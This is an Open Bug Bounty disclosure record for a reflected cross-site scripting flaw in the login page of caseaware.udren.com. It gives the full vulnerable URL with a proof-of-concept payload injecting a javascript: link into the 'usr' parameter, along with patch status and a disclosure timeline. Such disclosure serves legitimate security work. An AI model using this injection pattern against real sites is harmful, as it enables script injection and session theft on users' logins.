caseaware.udren.com XSS vulnerability

2017-04-27T06:46:00
ID OBB:228262
Type openbugbounty
Reporter justpentest
Modified 2017-10-17T13:58:00

Description

Vulnerable URL:
https://caseaware.udren.com:4322/login.php?mid=0&usr;=admin%27%3E%3Ca%20HREF=%22javascript:alert(%27OPENBUGBOUNTY%27)%22%3EClick_ME%3C%27

Details:

Description| Value
---|---
Patched:| Yes, on 17.10.2017
Latest check for patch:| 17.10.2017 13:58 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check caseaware.udren.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 27 April, 2017 06:46 GMT
Vulnerability existence verified and confirmed| 27 April, 2017 10:09 GMT
Generic security notifications sent to website owner| 27 April, 2017 10:09 GMT
Notification sent to subscribers (without technical details)| 27 April, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 28 April, 2017 15:32 GMT
Vulnerability patched by the website owner| 17 October, 2017 13:58 GMT